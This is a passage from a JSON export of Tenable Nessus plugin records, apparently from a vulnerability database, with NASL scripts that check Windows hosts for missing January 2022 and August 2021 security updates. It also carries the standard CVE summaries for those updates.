A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21850, CVE-2022-21851, CVE-2022-21922)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21857, CVE-2022-21862, CVE-2022-21884, CVE-2022-21885, CVE-2022-21897, CVE-2022-21903, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21848)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009601: Windows Server 2008 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21897", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925"], "modified": "2022-05-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009601.NASL", "href": "https://www.tenable.com/plugins/nessus/156625", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156625);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21848\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21862\",\n \"CVE-2022-21880\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21897\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\"\n );\n script_xref(name:\"MSKB\", value:\"5009601\");\n script_xref(name:\"MSKB\", value:\"5009627\");\n script_xref(name:\"MSFT\", value:\"MS22-5009601\");\n script_xref(name:\"MSFT\", value:\"MS22-5009627\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009601: Windows Server 2008 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009601\nor cumulative update 5009627. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21880, CVE-2022-21904,\n CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21850,\n CVE-2022-21851, CVE-2022-21922)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21857, CVE-2022-21862, CVE-2022-21884,\n CVE-2022-21885, CVE-2022-21897, CVE-2022-21903,\n CVE-2022-21908, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21848)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009601\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009627\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5009601 or Cumulative Update KB5009627.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21851\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-21922\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-01';\nkbs = make_list(\n '5009601', '5009627'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009601,5009627])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:50", "description": "The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n 